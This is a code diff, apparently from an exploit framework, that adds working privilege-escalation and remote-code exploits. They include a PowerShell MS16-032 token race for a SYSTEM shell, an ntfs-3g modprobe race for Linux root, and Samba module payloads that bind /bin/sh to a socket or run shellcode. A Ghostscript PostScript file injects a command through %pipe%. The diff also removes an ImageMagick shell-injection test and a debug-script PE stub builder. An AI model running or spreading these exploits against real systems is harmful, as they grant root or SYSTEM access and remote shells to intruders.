+    public static class Ntdll
+    {
+        [DllImport("ntdll.dll", SetLastError=true)]
+        public static extern int NtImpersonateThread(
+            IntPtr ThreadHandle,
+            IntPtr ThreadToImpersonate,
+            ref SQOS SecurityQualityOfService);
+    }
+"@
+
+    function Get-ThreadHandle {
+        # StartupInfo Struct
+        $StartupInfo = New-Object STARTUPINFO
+        $StartupInfo.dwFlags = 0x00000100 # STARTF_USESTDHANDLES
+        $StartupInfo.hStdInput = [Kernel32]::GetCurrentThread()
+        $StartupInfo.hStdOutput = [Kernel32]::GetCurrentThread()
+        $StartupInfo.hStdError = [Kernel32]::GetCurrentThread()
+        $StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
+
+        # ProcessInfo Struct
+        $ProcessInfo = New-Object PROCESS_INFORMATION
+
+        # CreateProcessWithLogonW --> lpCurrentDirectory
+        $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
+
+        $path1 = $env:windir
+        $path1 = "$path1\System32\cmd.exe"
+        # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
+        $CallResult = [Advapi32]::CreateProcessWithLogonW(
+            "user", "domain", "pass",
+            0x00000002, $path1, "",
+            0x00000004, $null, $GetCurrentPath,
+            [ref]$StartupInfo, [ref]$ProcessInfo)
+
+        # Duplicate handle into current process -> DUPLICATE_SAME_ACCESS
+        $lpTargetHandle = [IntPtr]::Zero
+        $CallResult = [Kernel32]::DuplicateHandle(
+            $ProcessInfo.hProcess, 0x4,
+            [Kernel32]::GetCurrentProcess(),
+            [ref]$lpTargetHandle, 0, $false,
+            0x00000002)
+
+        # Clean up suspended process
+        $CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
+        $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
+        $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
+
+        $lpTargetHandle
+    }
+
+    function Get-SystemToken {
+        echo "`n[?] Trying thread handle: $Thread"
+        echo "[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($Thread))).ProcessName)"
+
+        $CallResult = [Kernel32]::SuspendThread($Thread)
+        if ($CallResult -ne 0) {
+            echo "[!] $Thread is a bad thread, moving on.."
+            Return
+        } echo "[+] Thread suspended"
+
+        echo "[>] Wiping current impersonation token"
+        $CallResult = [Advapi32]::SetThreadToken([ref]$Thread, [IntPtr]::Zero)
+        if (!$CallResult) {
+            echo "[!] SetThreadToken failed, moving on.."
+            $CallResult = [Kernel32]::ResumeThread($Thread)
+            echo "[+] Thread resumed!"
+            Return
+        }
+
+        echo "[>] Building SYSTEM impersonation token"
+        # SecurityQualityOfService struct
+        $SQOS = New-Object SQOS
+        $SQOS.ImpersonationLevel = 2 #SecurityImpersonation
+        $SQOS.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SQOS)
+        # Undocumented API's, I like your style Microsoft ;)
+        $CallResult = [Ntdll]::NtImpersonateThread($Thread, $Thread, [ref]$sqos)
+        if ($CallResult -ne 0) {
+            echo "[!] NtImpersonateThread failed, moving on.."
+            $CallResult = [Kernel32]::ResumeThread($Thread)
+            echo "[+] Thread resumed!"
+            Return
+        }
+
+        $script:SysTokenHandle = [IntPtr]::Zero
+        # 0x0006 --> TOKEN_DUPLICATE -bor TOKEN_IMPERSONATE
+        $CallResult = [Advapi32]::OpenThreadToken($Thread, 0x0006, $false, [ref]$SysTokenHandle)
+        if (!$CallResult) {
+            echo "[!] OpenThreadToken failed, moving on.."
+            $CallResult = [Kernel32]::ResumeThread($Thread)
+            echo "[+] Thread resumed!"
+            Return
+        }
+
+        echo "[?] Success, open SYSTEM token handle: $SysTokenHandle"
+        echo "[+] Resuming thread.."
+        $CallResult = [Kernel32]::ResumeThread($Thread)
+    }
+
+    # main() <--- ;)
+
+    # Check logical processor count, race condition requires 2+
+    echo "`n[?] Operating system core count: $([System.Environment]::ProcessorCount)"
+    if ($([System.Environment]::ProcessorCount) -lt 2) {
+        echo "[!] This is a VM isn't it, race condition requires at least 2 CPU cores, exiting!`n"
+        Return
+    }
+
+    # Create array for Threads & TID's
+    $ThreadArray = @()
+    $TidArray = @()
+
+    echo "[>] Duplicating CreateProcessWithLogonW handles.."
+    # Loop 1 is fine, this never fails unless patched in which case the handle is 0
+    for ($i=0; $i -lt 1; $i++) {
+        $hThread = Get-ThreadHandle
+        $hThreadID = [Kernel32]::GetThreadId($hThread)
+        # Bit hacky/lazy, filters on uniq/valid TID's to create $ThreadArray
+        if ($TidArray -notcontains $hThreadID) {
+            $TidArray += $hThreadID
+            if ($hThread -ne 0) {
+                $ThreadArray += $hThread # This is what we need!
+            }
+        }
+    }
+
+    if ($($ThreadArray.length) -eq 0) {
+        echo "[!] No valid thread handles were captured, exiting!"
+        Return
+    } else {
+        echo "[?] Done, got $($ThreadArray.length) thread handle(s)!"
+        echo "`n[?] Thread handle list:"
+        $ThreadArray
+    }
+
+    echo "`n[*] Sniffing out privileged impersonation token.."
+    foreach ($Thread in $ThreadArray){
+
+        # Get handle to SYSTEM access token
+        Get-SystemToken
+
+        echo "`n[*] Sniffing out SYSTEM shell.."
+        echo "`n[>] Duplicating SYSTEM token"
+        $hDuplicateTokenHandle = [IntPtr]::Zero
+        $CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle)
+
+        # Simple PS runspace definition
+        echo "[>] Starting token race"
+        $Runspace = [runspacefactory]::CreateRunspace()
+        $StartTokenRace = [powershell]::Create()
+        $StartTokenRace.runspace = $Runspace
+        $Runspace.Open()
+        [void]$StartTokenRace.AddScript({
+            Param ($Thread, $hDuplicateTokenHandle)
+            while ($true) {
+                $CallResult = [Advapi32]::SetThreadToken([ref]$Thread, $hDuplicateTokenHandle)
+            }
+        }).AddArgument($Thread).AddArgument($hDuplicateTokenHandle)
+        $AscObj = $StartTokenRace.BeginInvoke()
+
+        echo "[>] Starting process race"
+        # Adding a timeout (10 seconds) here to safeguard from edge-cases
+        $SafeGuard = [diagnostics.stopwatch]::StartNew()
+        while ($SafeGuard.ElapsedMilliseconds -lt 10000) {
+        # StartupInfo Struct
+        $StartupInfo = New-Object STARTUPINFO
+        $StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
+
+        # ProcessInfo Struct
+        $ProcessInfo = New-Object PROCESS_INFORMATION
+
+        # CreateProcessWithLogonW --> lpCurrentDirectory
+        $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
+
+        # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
+        $CallResult = [Advapi32]::CreateProcessWithLogonW(
+            "user", "domain", "pass",
+            0x00000002, $cmd, $args1,
+            0x00000004, $null, $GetCurrentPath,
+            [ref]$StartupInfo, [ref]$ProcessInfo)
+
+    #---
+    # Make sure CreateProcessWithLogonW ran successfully! If not, skip loop.
+    #---
+    # Missing this check used to cause the exploit to fail sometimes.
+    # If CreateProcessWithLogon fails OpenProcessToken won't succeed
+    # but we obviously don't have a SYSTEM shell :'( . Should be 100%
+    # reliable now!
+    #---
+    if (!$CallResult) {
+        continue
+    }
+
+        $hTokenHandle = [IntPtr]::Zero
+        $CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle)
+
+        # If we can't open the process token it's a SYSTEM shell!
+        if (!$CallResult) {
+            echo "[!] Holy handle leak Batman, we have a SYSTEM shell!!`n"
+            $CallResult = [Kernel32]::ResumeThread($ProcessInfo.hThread)
+            $StartTokenRace.Stop()
+            $SafeGuard.Stop()
+            Return
+        }
+
+        # Clean up suspended process
+        $CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
+        $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
+        $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
+        }
+
+        # Kill runspace & stopwatch if edge-case
+        $StartTokenRace.Stop()
+        $SafeGuard.Stop()
+    }
+    exit
@@ -1,14 +0,0 @@
-id=ImageMagick  version=1.0
-class=DirectClass  colors=0  matte=False
-columns=1  rows=1  depth=16
-colorspace=sRGB
-page=1x1+0+0
-rendering-intent=Perceptual
-gamma=0.454545
-red-primary=0.64,0.33  green-primary=0.3,0.6  blue-primary=0.15,0.06
-white-point=0.3127,0.329
-date:create=2016-05-04T00:19:42-05:00
-date:modify=2016-05-04T00:19:42-05:00
-label={";echo vulnerable"}
-
-:ÿÿÿÿÿÿ
@@ -0,0 +1,196 @@
+#define _GNU_SOURCE
+#include <stdbool.h>
+#include <errno.h>
+#include <sys/inotify.h>
+#include <unistd.h>
+#include <err.h>
+#include <stdlib.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <fcntl.h>
+#include <sys/eventfd.h>
+#include <signal.h>
+#include <poll.h>
+#include <stdio.h>
+#include <sys/prctl.h>
+#include <string.h>
+#include <sys/wait.h>
+#include <time.h>
+#include <sys/utsname.h>
+
+int main(void) {
+  /* prevent shell from backgrounding ntfs-3g when stopped */
+  pid_t initial_fork_child = fork();
+  if (initial_fork_child == -1)
+    err(1, "initial fork");
+  if (initial_fork_child != 0) {
+    int status;
+    if (waitpid(initial_fork_child, &status, 0) != initial_fork_child)
+      err(1, "waitpid");
+    execl("rootshell", "rootshell", NULL);
+    exit(0);
+  }
+
+  char buf[1000] = {0};
+  // Set up workspace with volume, mountpoint, modprobe config and module directory.
+  char template[] = "/tmp/ntfs_sploit.XXXXXX";
+  if (mkdtemp(template) == NULL)
+    err(1, "mkdtemp");
+  char volume[100], mountpoint[100], modprobe_confdir[100], modprobe_conffile[100];
+  sprintf(volume, "%s/volume", template);
+  sprintf(mountpoint, "%s/mountpoint", template);
+  sprintf(modprobe_confdir, "%s/modprobe.d", template);
+  sprintf(modprobe_conffile, "%s/sploit.conf", modprobe_confdir);
+  if (mkdir(volume, 0777) || mkdir(mountpoint, 0777) || mkdir(modprobe_confdir, 0777))
+    err(1, "mkdir");
+  int conffd = open(modprobe_conffile, O_WRONLY|O_CREAT, 0666);
+  if (conffd == -1)
+    err(1, "open modprobe config");
+  int suidfile_fd = open("rootshell", O_RDONLY);
+  if (suidfile_fd == -1)
+    err(1, "unable to open ./rootshell");
+  char modprobe_config[200];
+  sprintf(modprobe_config, "alias fuse rootmod\noptions rootmod suidfile_fd=%d\n", suidfile_fd);
+  if (write(conffd, modprobe_config, strlen(modprobe_config)) != strlen(modprobe_config))
+    errx(1, "modprobe config write failed");
+  close(conffd);
+  // module directory setup
+  char system_cmd[1000];
+  sprintf(system_cmd, "mkdir -p %s/lib/modules/$(uname -r) && cp rootmod.ko *.bin %s/lib/modules/$(uname -r)/",
+    template, template);
+  if (system(system_cmd))
+    errx(1, "shell command failed");
+
+  // Set up inotify watch for /proc/mounts.
+  // Note: /proc/mounts is a symlink to /proc/self/mounts, so
+  // the watch will only see accesses by this process.
+  int inotify_fd = inotify_init1(IN_CLOEXEC);
+  if (inotify_fd == -1)
+    err(1, "unable to create inotify fd?");
+  if (inotify_add_watch(inotify_fd, "/proc/mounts", IN_OPEN) == -1)
+    err(1, "unable to watch /proc/mounts");
+
+  // Set up inotify watch for /proc/filesystems.
+  // This can be used to detect whether we lost the race.
+  int fs_inotify_fd = inotify_init1(IN_CLOEXEC);
+  if (fs_inotify_fd == -1)
+    err(1, "unable to create inotify fd?");
+  if (inotify_add_watch(fs_inotify_fd, "/proc/filesystems", IN_OPEN) == -1)
+    err(1, "unable to watch /proc/filesystems");
+
+  // Set up inotify watch for /sbin/modprobe.
+  // This can be used to detect when we can release all our open files.
+  int modprobe_inotify_fd = inotify_init1(IN_CLOEXEC);
+  if (modprobe_inotify_fd == -1)
+    err(1, "unable to create inotify fd?");
+  if (inotify_add_watch(modprobe_inotify_fd, "/sbin/modprobe", IN_OPEN) == -1)
+    err(1, "unable to watch /sbin/modprobe");
+
+  int do_exec_pipe[2];
+  if (pipe2(do_exec_pipe, O_CLOEXEC))
+    err(1, "pipe");
+  pid_t child = fork();
+  if (child == -1)
+    err(1, "fork");
+  if (child != 0) {
+    if (read(do_exec_pipe[0], buf, 1) != 1)
+      errx(1, "pipe read failed");
+    char modprobe_opts[300];
+    sprintf(modprobe_opts, "-C %s -d %s", modprobe_confdir, template);
+    setenv("MODPROBE_OPTIONS", modprobe_opts, 1);
+    execlp("ntfs-3g", "ntfs-3g", volume, mountpoint, NULL);
+  }
+  child = getpid();
+
+  // Now launch ntfs-3g and wait until it opens /proc/mounts
+  if (write(do_exec_pipe[1], buf, 1) != 1)
+    errx(1, "pipe write failed");
+
+  if (read(inotify_fd, buf, sizeof(buf)) <= 0)
+    errx(1, "inotify read failed");
+  if (kill(getppid(), SIGSTOP))
+    err(1, "can't stop setuid parent");
+
+  // Check whether we won the main race.
+  struct pollfd poll_fds[1] = {{
+    .fd = fs_inotify_fd,
+    .events = POLLIN
+  }};
+  int poll_res = poll(poll_fds, 1, 100);
+  if (poll_res == -1)
+    err(1, "poll");
+  if (poll_res == 1) {
+    puts("looks like we lost the race");
+    if (kill(getppid(), SIGKILL))
+      perror("SIGKILL after lost race");
+    char rm_cmd[100];
+    sprintf(rm_cmd, "rm -rf %s", template);
+    system(rm_cmd);
+    exit(1);
+  }
+  puts("looks like we won the race");
+
+  // Open as many files as possible. Whenever we have
+  // a bunch of open files, move them into a new process.
+  int total_open_files = 0;
+  while (1) {
+    #define LIMIT 500
+    int open_files[LIMIT];
+    bool reached_limit = false;
+    int n_open_files;
+    for (n_open_files = 0; n_open_files < LIMIT; n_open_files++) {
+      open_files[n_open_files] = eventfd(0, 0);
+      if (open_files[n_open_files] == -1) {
+        if (errno != ENFILE)
+          err(1, "eventfd() failed");
+        printf("got ENFILE at %d total\n", total_open_files);
+        reached_limit = true;
+        break;
+      }
+      total_open_files++;
+    }
+    pid_t fd_stasher_child = fork();
+    if (fd_stasher_child == -1)
+      err(1, "fork (for eventfd holder)");
+    if (fd_stasher_child == 0) {
+      prctl(PR_SET_PDEATHSIG, SIGKILL);
+      // close PR_SET_PDEATHSIG race window
+      if (getppid() != child) raise(SIGKILL);
+      while (1) pause();
+    }
+    for (int i = 0; i < n_open_files; i++)
+      close(open_files[i]);
+    if (reached_limit)
+      break;
+  }
+
+  // Wake up ntfs-3g and keep allocating files, then free up
+  // the files as soon as we're reasonably certain that either
+  // modprobe was spawned or the attack failed.
+  if (kill(getppid(), SIGCONT))
+    err(1, "SIGCONT");
+
+  time_t start_time = time(NULL);
+  while (1) {
+    for (int i=0; i<1000; i++) {
+      int efd = eventfd(0, 0);
+      if (efd == -1 && errno != ENFILE)
+        err(1, "gapfiller eventfd() failed unexpectedly");
+    }
+    struct pollfd modprobe_poll_fds[1] = {{
+      .fd = modprobe_inotify_fd,
+      .events = POLLIN
+    }};
+    int modprobe_poll_res = poll(modprobe_poll_fds, 1, 0);
+    if (modprobe_poll_res == -1)
+      err(1, "poll");
+    if (modprobe_poll_res == 1) {
+      puts("yay, modprobe ran!");
+      exit(0);
+    }
+    if (time(NULL) > start_time + 3) {
+      puts("modprobe didn't run?");
+      exit(1);
+    }
+  }
+}
@@ -0,0 +1,48 @@
+#!/bin/bash
+
+build () {
+  CC=$1
+  TARGET_SUFFIX=$2
+  CFLAGS=$3
+
+  echo "[*] Building for ${TARGET_SUFFIX}..."
+  for type in {shellcode,system,findsock}
+   do ${CC} ${CFLAGS} -Wall -Werror -fPIC -fno-stack-protector samba-root-${type}.c -shared -o samba-root-${type}-${TARGET_SUFFIX}.so
+  done
+}
+
+rm -f *.o *.so *.gz
+
+#
+# Linux GLIBC
+#
+
+# x86
+build "gcc" "linux-glibc-x86_64" "-m64 -D OLD_LIB_SET_2"
+build "gcc" "linux-glibc-x86" "-m32 -D OLD_LIB_SET_1"
+
+# ARM
+build "arm-linux-gnueabi-gcc-5" "linux-glibc-armel" "-march=armv5 -mlittle-endian"
+build "arm-linux-gnueabihf-gcc-5" "linux-glibc-armhf" "-march=armv7 -mlittle-endian"
+build "aarch64-linux-gnu-gcc-4.9" "linux-glibc-aarch64" ""
+
+# MIPS
+build "mips-linux-gnu-gcc-5" "linux-glibc-mips" "-D OLD_LIB_SET_1"
+build "mipsel-linux-gnu-gcc-5"  "linux-glibc-mipsel" "-D OLD_LIB_SET_1"
+build "mips64-linux-gnuabi64-gcc-5"  "linux-glibc-mips64" "-D OLD_LIB_SET_1"
+build "mips64el-linux-gnuabi64-gcc-5" "linux-glibc-mips64el" "-D OLD_LIB_SET_1"
+
+# SPARC
+build "sparc64-linux-gnu-gcc-5" "linux-glibc-sparc64" ""
+build "sparc64-linux-gnu-gcc-5" "linux-glibc-sparc" "-m32 -D OLD_LIB_SET_1"
+
+# PowerPC
+build "powerpc-linux-gnu-gcc-5" "linux-glibc-powerpc" "-D OLD_LIB_SET_1"
+build "powerpc64-linux-gnu-gcc-5" "linux-glibc-powerpc64" ""
+build "powerpc64le-linux-gnu-gcc-4.9" "linux-glibc-powerpc64le" ""
+
+# S390X
+build "s390x-linux-gnu-gcc-5" "linux-glibc-s390x" ""
+
+gzip -9 *.so
+rm -f *.o *.so
@@ -0,0 +1,21 @@
+#!/bin/bash
+
+# Assume x86_64 Ubuntu 16.04 base system
+apt-get install build-essential \
+  gcc-5-multilib \
+  gcc-5-multilib-arm-linux-gnueabi \
+  gcc-5-multilib-arm-linux-gnueabihf \
+  gcc-5-multilib-mips-linux-gnu \
+  gcc-5-multilib-mips64-linux-gnuabi64 \
+  gcc-5-multilib-mips64el-linux-gnuabi64 \
+  gcc-5-multilib-mipsel-linux-gnu \
+  gcc-5-multilib-powerpc-linux-gnu \
+  gcc-5-multilib-powerpc64-linux-gnu \
+  gcc-5-multilib-s390x-linux-gnu \
+  gcc-5-multilib-sparc64-linux-gnu \
+  gcc-4.9-powerpc64le-linux-gnu \
+  gcc-4.9-aarch64-linux-gnu
+
+if [ ! -e /usr/include/asm ];
+  then ln -sf /usr/include/asm-generic /usr/include/asm
+fi
@@ -0,0 +1,67 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdbool.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <arpa/inet.h>
+#include <signal.h>
+#include <string.h>
+
+#ifdef OLD_LIB_SET_1
+__asm__(".symver execve,execve@GLIBC_2.0");
+__asm__(".symver dup2,dup2@GLIBC_2.0");
+__asm__(".symver getsockname,getsockname@GLIBC_2.0");
+#endif
+
+#ifdef OLD_LIB_SET_2
+__asm__(".symver execve,execve@GLIBC_2.2.5");
+__asm__(".symver dup2,dup2@GLIBC_2.2.5");
+__asm__(".symver getsockname,getsockname@GLIBC_2.2.5");
+#endif
+
+extern bool change_to_root_user(void);
+
+// Samba 4 looks for samba_init_module
+int samba_init_module(void)
+{
+  char *args[2] = {"/bin/sh", 0};
+  struct sockaddr_in sa;
+  socklen_t sl = sizeof(sa);
+  int s;
+  unsigned char buff[] = {
+    0x00, 0x00, 0x00, 0x23, 0xff, 0x53, 0x4d, 0x42,
+    0xa2, 0x39, 0x00, 0x00, 0xc0, 0x88, 0x03, 0xc8,
+    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+    0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x64, 0x7e,
+    0x64, 0x00, 0x8c, 0x00, 0x00, 0x00, 0x00
+  };
+
+  change_to_root_user();
+
+  for (s=4096; s>0; s--) {
+
+    // Skip over invalid sockets
+    if (getsockname(s, (struct sockaddr *)&sa, &sl) != 0)
+      continue;
+
+    // Skip over non internet sockets
+    if (sa.sin_family != AF_INET)
+      continue;
+
+    // Send a semi-valid SMB response to simplify things
+    send(s, buff, sizeof(buff), 0);
+
+    // Duplicate standard input/output/error
+    dup2(s, 0);
+    dup2(s, 1);
+    dup2(s, 2);
+
+    execve(args[0], args, NULL);
+  }
+
+  return 0;
+}
+
+// Samba 3 looks for init_samba_module
+int init_samba_module(void) {  return samba_init_module(); }
@@ -0,0 +1,47 @@
+#include <stdio.h>
+#include <stdbool.h>
+#include <unistd.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <signal.h>
+
+#ifdef OLD_LIB_SET_1
+__asm__(".symver mmap,mmap@GLIBC_2.0");
+__asm__(".symver memcpy,memcpy@GLIBC_2.0");
+__asm__(".symver fork,fork@GLIBC_2.0");
+#endif
+
+#ifdef OLD_LIB_SET_2
+__asm__(".symver mmap,mmap@GLIBC_2.2.5");
+__asm__(".symver memcpy,memcpy@GLIBC_2.2.5");
+__asm__(".symver fork,fork@GLIBC_2.2.5");
+#endif
+
+#define PAYLOAD_SIZE 10000
+unsigned char payload[PAYLOAD_SIZE] = {'P','A','Y','L','O','A','D',0};
+
+extern bool change_to_root_user(void);
+
+// Samba 4 looks for samba_init_module
+int samba_init_module(void)
+{
+  void *mem;
+  void (*fn)();
+
+  change_to_root_user();
+  mem = mmap(NULL, PAYLOAD_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
+  if (mem == MAP_FAILED)
+    return 0;
+
+  memcpy(mem, payload, PAYLOAD_SIZE);
+  fn = (void(*)())mem;
+
+  if (! fork()) {
+    fn();
+    kill(getpid(), 9);
+  }
+  return 0;
+}
+
+// Samba 3 looks for init_samba_module
+int init_samba_module(void) {  return samba_init_module(); }
@@ -0,0 +1,34 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdbool.h>
+#include <unistd.h>
+#include <sys/mman.h>
+#include <string.h>
+
+#ifdef OLD_LIB_SET_1
+__asm__(".symver system,system@GLIBC_2.0");
+__asm__(".symver fork,fork@GLIBC_2.0");
+#endif
+
+#ifdef OLD_LIB_SET_2
+__asm__(".symver system,system@GLIBC_2.2.5");
+__asm__(".symver fork,fork@GLIBC_2.2.5");
+#endif
+
+#define PAYLOAD_SIZE 10000
+unsigned char payload[PAYLOAD_SIZE] = {'P','A','Y','L','O','A','D',0};
+
+extern bool change_to_root_user(void);
+
+// Samba 4 looks for samba_init_module
+int samba_init_module(void)
+{
+  change_to_root_user();
+  if (! fork()) {
+    system((const char*)payload);
+  }
+  return 0;
+}
+
+// Samba 3 looks for init_samba_module
+int init_samba_module(void) {  return samba_init_module(); }
@@ -0,0 +1,101 @@
+%!PS-Adobe-3.0 EPSF-3.0
+%%BoundingBox: -0 -0 100 100
+
+
+/size_from  10000      def
+/size_step    500      def
+/size_to   65000      def
+/enlarge    1000      def
+
+%/bigarr 65000 array def
+
+0
+size_from size_step size_to {
+    pop
+    1 add
+} for
+
+/buffercount exch def
+
+/buffersizes buffercount array def
+
+
+0
+size_from size_step size_to {
+    buffersizes exch 2 index exch put
+    1 add
+} for
+pop
+
+/buffers buffercount array def
+
+0 1 buffercount 1 sub {
+    /ind exch def
+    buffersizes ind get /cursize exch def
+    cursize string /curbuf exch def
+    buffers ind curbuf put
+    cursize 16 sub 1 cursize 1 sub {
+        curbuf exch 255 put
+    } for
+} for
+
+
+/buffersearchvars [0 0 0 0 0] def
+/sdevice [0] def
+
+enlarge array aload
+
+{
+    .eqproc
+    buffersearchvars 0 buffersearchvars 0 get 1 add put
+    buffersearchvars 1 0 put
+    buffersearchvars 2 0 put
+    buffercount {
+        buffers buffersearchvars 1 get get
+        buffersizes buffersearchvars 1 get get
+        16 sub get
+        254 le {
+            buffersearchvars 2 1 put
+            buffersearchvars 3 buffers buffersearchvars 1 get get put
+            buffersearchvars 4 buffersizes buffersearchvars 1 get get 16 sub put
+        } if
+        buffersearchvars 1 buffersearchvars 1 get 1 add put
+    } repeat
+
+    buffersearchvars 2 get 1 ge {
+        exit
+    } if
+    %(.) print
+} loop
+
+.eqproc
+.eqproc
+.eqproc
+sdevice 0
+currentdevice
+buffersearchvars 3 get buffersearchvars 4 get 16#7e put
+buffersearchvars 3 get buffersearchvars 4 get 1 add 16#12 put
+buffersearchvars 3 get buffersearchvars 4 get 5 add 16#ff put
+put
+
+
+buffersearchvars 0 get array aload
+
+sdevice 0 get
+16#3e8 0 put
+
+sdevice 0 get
+16#3b0 0 put
+
+sdevice 0 get
+16#3f0 0 put
+
+
+currentdevice null false mark /OutputFile (%pipe%echo vulnerable > /dev/tty)
+.putdeviceparams
+1 true .outputpage
+.rsdparams
+%{ } loop
+0 0 .quit
+%asdf
+
@@ -1,91 +0,0 @@
-echo a 0100 >>decoder_stub
-echo jmp 197 >>decoder_stub
-echo mov bx,[1bd] >>decoder_stub
-echo call 131 >>decoder_stub
-echo mov bx,[1cc] >>decoder_stub
-echo call 131 >>decoder_stub
-echo mov ax,4c00 >>decoder_stub
-echo int 21 >>decoder_stub
-echo mov ah,3d >>decoder_stub
-echo mov al,00 >>decoder_stub
-echo mov dx,1bf >>decoder_stub
-echo int 21 >>decoder_stub
-echo mov [1bd],ax >>decoder_stub
-echo ret >>decoder_stub
-echo mov ah,3c >>decoder_stub
-echo mov cx,2 >>decoder_stub
-echo mov dx,1ce >>decoder_stub
-echo int 21 >>decoder_stub
-echo mov [1cc],ax >>decoder_stub
-echo ret >>decoder_stub
-echo mov ax,3e00 >>decoder_stub
-echo int 21 >>decoder_stub
-echo ret >>decoder_stub
-echo mov bx,[1bd] >>decoder_stub
-echo mov ax,3f00 >>decoder_stub
-echo mov cx,100 >>decoder_stub
-echo mov dx,0200 >>decoder_stub
-echo int 21 >>decoder_stub
-echo cmp ax,2 >>decoder_stub
-echo ja 151 >>decoder_stub
-echo call 178 >>decoder_stub
-echo call 103 >>decoder_stub
-echo ret >>decoder_stub
-echo mov ah,0 >>decoder_stub
-echo or al,20 >>decoder_stub
-echo sub al,30 >>decoder_stub
-echo cmp al,9 >>decoder_stub
-echo jbe 164 >>decoder_stub
-echo sub al,31 >>decoder_stub
-echo cmp al,5 >>decoder_stub
-echo ja 165 >>decoder_stub
-echo add al,a >>decoder_stub
-echo ret >>decoder_stub
-echo mov ah,ff >>decoder_stub
-echo ret >>decoder_stub
-echo cmp bp,0 >>decoder_stub
-echo jne 175 >>decoder_stub
-echo call 137 >>decoder_stub
-echo mov bp,ax >>decoder_stub
-echo mov si,200 >>decoder_stub
-echo lodsb >>decoder_stub
-echo dec bp >>decoder_stub
-echo ret >>decoder_stub
-echo mov cx,di >>decoder_stub
-echo sub cx,300 >>decoder_stub
-echo mov bx,[1cc] >>decoder_stub
-echo mov ax,4000 >>decoder_stub
-echo mov dx,0300 >>decoder_stub
-echo int 21 >>decoder_stub
-echo ret >>decoder_stub
-echo call 168 >>decoder_stub
-echo call 152 >>decoder_stub
-echo cmp ah,0 >>decoder_stub
-echo jne 18b >>decoder_stub
-echo ret >>decoder_stub
-echo call 116 >>decoder_stub
-echo call 123 >>decoder_stub
-echo mov bp,0 >>decoder_stub
-echo mov di,300 >>decoder_stub
-echo call 18b >>decoder_stub
-echo mov cx,1000 >>decoder_stub
-echo mul cx >>decoder_stub
-echo push ax >>decoder_stub
-echo call 18b >>decoder_stub
-echo pop dx >>decoder_stub
-echo or al,dh >>decoder_stub
-echo stosb >>decoder_stub
-echo cmp bp, 0 >>decoder_stub
-echo jne 1a3 >>decoder_stub
-echo call 178 >>decoder_stub
-echo jmp 1a0 >>decoder_stub
-echo db 00,00 >>decoder_stub
-echo db "testfile.dat",00 >>decoder_stub
-echo db 00,00 >>decoder_stub
-echo db "testfile.out",00 >>decoder_stub
-echo  >>decoder_stub
-echo r cx >>decoder_stub
-echo 0400 >>decoder_stub
-echo n h2b.com >>decoder_stub
-echo w >>decoder_stub
-echo q >>decoder_stub
@@ -1,819 +0,0 @@
-echo n decoder_stub.bin > decoder_stub
-echo r cx >>decoder_stub
-echo 1400 >>decoder_stub
-echo f 0100 ffff 00 >>decoder_stub
-echo e 100 4d 5a 90 >>decoder_stub
-echo e 104 03 >>decoder_stub
-echo e 108 04 >>decoder_stub
-echo e 10c ff ff >>decoder_stub
-echo e 110 b8 >>decoder_stub
-echo e 118 40 >>decoder_stub
-echo e 13c 80 >>decoder_stub
-echo e 140 0e 1f ba 0e >>decoder_stub
-echo e 145 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 >>decoder_stub
-echo e 159 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 >>decoder_stub
-echo e 16d 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 >>decoder_stub
-echo e 180 50 45 >>decoder_stub
-echo e 184 4c 01 03 >>decoder_stub
-echo e 188 85 18 7c 48 >>decoder_stub
-echo e 194 e0 >>decoder_stub
-echo e 196 0e 01 0b 01 08 >>decoder_stub
-echo e 19d 0a >>decoder_stub
-echo e 1a1 08 >>decoder_stub
-echo e 1a8 be 28 >>decoder_stub
-echo e 1ad 20 >>decoder_stub
-echo e 1b1 40 >>decoder_stub
-echo e 1b6 40 >>decoder_stub
-echo e 1b9 20 >>decoder_stub
-echo e 1bd 02 >>decoder_stub
-echo e 1c0 04 >>decoder_stub
-echo e 1c8 04 >>decoder_stub
-echo e 1d1 80 >>decoder_stub
-echo e 1d5 02 >>decoder_stub
-echo e 1dc 03 >>decoder_stub
-echo e 1de 40 05 >>decoder_stub
-echo e 1e2 10 >>decoder_stub
-echo e 1e5 10 >>decoder_stub
-echo e 1ea 10 >>decoder_stub
-echo e 1ed 10 >>decoder_stub
-echo e 1f4 10 >>decoder_stub
-echo e 200 6c 28 >>decoder_stub
-echo e 204 4f >>decoder_stub
-echo e 209 40 >>decoder_stub
-echo e 20c 30 05 >>decoder_stub
-echo e 221 60 >>decoder_stub
-echo e 224 0c >>decoder_stub
-echo e 228 fc 27 >>decoder_stub
-echo e 22c 1c >>decoder_stub
-echo e 259 20 >>decoder_stub
-echo e 25c 08 >>decoder_stub
-echo e 268 08 20 >>decoder_stub
